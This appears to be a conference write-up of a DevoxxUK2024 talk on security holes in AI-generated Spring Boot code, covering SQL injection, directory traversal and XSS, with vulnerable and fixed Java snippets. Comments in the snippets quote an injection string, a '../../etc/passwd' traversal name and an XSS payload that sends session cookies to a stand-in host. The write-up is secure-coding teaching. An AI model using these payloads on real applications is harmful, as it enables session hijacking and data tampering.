[DevoxxUK2024] Breaking AI: Live Coding and Hacking Applications with Generative AI by Simon Maple and Brian Vermeer

Simon Maple and Brian Vermeer, both seasoned developer advocates with extensive experience at Snyk and other tech firms, delivered an electrifying live coding session at DevoxxUK2024, exploring the double-edged sword of generative AI in software development. Simon, who has recently moved to a stealth-mode startup, and Brian, a current Snyk advocate, demonstrate how tools like GitHub Copilot and ChatGPT can accelerate coding velocity while introducing significant security risks. Through a live-coded Spring Boot coffee shop application, they expose vulnerabilities such as SQL injection, directory traversal, and cross-site scripting, emphasizing the need for rigorous validation and security practices. Their engaging, demo-driven approach underscores the balance between innovation and caution, offering developers actionable insights for leveraging AI safely.

Accelerating Development with Generative AI

Simon and Brian kick off by highlighting the productivity boost offered by generative AI tools, citing studies that suggest a 55% increase in developer efficiency and a 27% higher likelihood of meeting project goals. They build a Spring Boot application with a Thymeleaf front end, using Copilot to generate a homepage with a banner and product table. The process showcases AI’s ability to rapidly produce code snippets, such as HTML fragments, based on minimal prompts. However, they caution that this speed comes with risks, as AI often prioritizes completion over correctness, potentially embedding vulnerabilities. Their live demo illustrates how Copilot’s suggestions evolve with context, but also how developers must critically evaluate outputs to ensure functionality and security.
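For flavor, here is a minimal sketch of the kind of Spring MVC controller such a prompt tends to yield; the class name, route, and hard-coded product list are illustrative assumptions, not the session's actual code:

```java
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;

import java.util.List;

@Controller
public class HomeController {

    // Renders the Thymeleaf template "index", which displays the banner
    // and iterates over "products" (e.g., with th:each) to build the table.
    @GetMapping("/")
    public String home(Model model) {
        model.addAttribute("products", List.of("Espresso", "Latte", "Cold Brew"));
        return "index";
    }
}
```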

Exposing SQL Injection Vulnerabilities

The duo dives into a search functionality for their coffee shop application, where Copilot generates a query to filter products by name or description. However, the initial code concatenates user input directly into an SQL query, creating a classic SQL injection vulnerability. Brian demonstrates an exploit by injecting malicious input to set product prices to zero, highlighting how unchecked AI-generated code can compromise a system. They then refactor the code using prepared statements, showing how parameterization separates user input from the query execution plan, effectively neutralizing the vulnerability. This example underscores the importance of understanding AI outputs and applying secure coding practices, as tools like Copilot may not inherently prioritize security.
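To make the refactor concrete, here is a hedged Java sketch of the pattern they describe: the vulnerable concatenation, then the parameterized replacement. The ProductSearch class and the products/name/description schema are illustrative, not the talk's exact code:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class ProductSearch {

    private final Connection connection;

    public ProductSearch(Connection connection) {
        this.connection = connection;
    }

    // Vulnerable shape: concatenating input lets attacker text be parsed as SQL, e.g.
    //   "SELECT name FROM products WHERE name LIKE '%" + keyword + "%'"
    // so input like  ' OR '1'='1  changes the query's meaning; in the demo,
    // a crafted payload even set every product's price to zero.

    // Parameterized version: input is bound as data, never as SQL syntax.
    public List<String> search(String keyword) throws SQLException {
        String sql = "SELECT name FROM products WHERE name LIKE ? OR description LIKE ?";
        List<String> names = new ArrayList<>();
        try (PreparedStatement ps = connection.prepareStatement(sql)) {
            ps.setString(1, "%" + keyword + "%");
            ps.setString(2, "%" + keyword + "%");
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    names.add(rs.getString("name"));
                }
            }
        }
        return names;
    }
}
```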

Mitigating Directory Traversal Risks

Next, Simon and Brian tackle a profile picture upload feature, where Copilot generates code to save files to a directory. The initial implementation concatenates user-provided file names with a base path, opening the door to directory traversal attacks. Using Burp Suite, they demonstrate how an attacker could overwrite critical files by manipulating the file name with “../” sequences. To address this, they refine the code to normalize paths, ensuring files remain within the intended directory. The session highlights the limitations of AI in detecting complex vulnerabilities like path traversal, emphasizing the need for developer vigilance and tools like Snyk to catch issues early in the development cycle.
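A compact Java sketch of the mitigation they apply: resolve the user-supplied name against a fixed base directory, normalize the result, and reject anything that escapes it. The class name and upload directory are illustrative assumptions:

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;

public class ProfilePictureStore {

    private static final Path UPLOAD_DIR = Path.of("/var/app/uploads").normalize();

    // Vulnerable shape: UPLOAD_DIR + userFileName, where a name like
    // "../../etc/passwd" walks out of the upload directory entirely.

    public void save(String userFileName, InputStream data) throws IOException {
        // Resolve against the base directory, then normalize away ".." segments.
        Path target = UPLOAD_DIR.resolve(userFileName).normalize();

        // Reject anything that ends up outside the intended directory.
        if (!target.startsWith(UPLOAD_DIR)) {
            throw new IOException("Invalid file name: " + userFileName);
        }
        Files.copy(data, target, StandardCopyOption.REPLACE_EXISTING);
    }
}
```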

Addressing Cross-Site Scripting Threats

The final vulnerability explored is cross-site scripting (XSS) in a product page feature. The AI-generated code embeds user input (product names) directly into HTML without escaping, allowing Brian to inject a malicious script that captures session cookies. They demonstrate both reflected and stored XSS, showing how attackers could exploit these flaws to hijack user sessions. When a ChatGPT code review fails to pinpoint the XSS issue, Simon and Brian advocate escaping output with established helpers such as Spring's HtmlUtils. This segment reinforces the necessity of combining AI tools with robust security practices and automated scanning to mitigate risks that AI might overlook.
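A short Java sketch of output escaping with Spring's HtmlUtils, the kind of helper the escaping advice points to; the ProductView class and markup are illustrative:

```java
import org.springframework.web.util.HtmlUtils;

public class ProductView {

    // Vulnerable shape: raw interpolation executes attacker markup, e.g.
    //   "<h1>" + productName + "</h1>"
    // with a name like <script>fetch('https://evil.example/?c='+document.cookie)</script>
    // runs in the victim's browser and can exfiltrate session cookies.

    // Escaped version: markup characters become HTML entities, so the
    // payload renders as inert text instead of executing.
    public String renderHeading(String productName) {
        return "<h1>" + HtmlUtils.htmlEscape(productName) + "</h1>";
    }
}
```

Worth noting: Thymeleaf's th:text escapes by default, so XSS of this kind usually enters through th:utext or hand-assembled HTML strings.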

Balancing Innovation and Security

Throughout the session, Simon and Brian stress that generative AI, while transformative, demands a cautious approach. They liken AI tools to junior developers, capable of producing functional code but requiring oversight to avoid errors or vulnerabilities. Real-world examples, such as a Samsung employee leaking sensitive code via ChatGPT, underscore the risks of blindly trusting AI outputs. They advocate for education, clear guidelines, and security tooling to complement AI-assisted development. By integrating tools like Snyk for vulnerability scanning and fostering a culture of code review, developers can harness AI’s potential while safeguarding their applications against threats.

Links: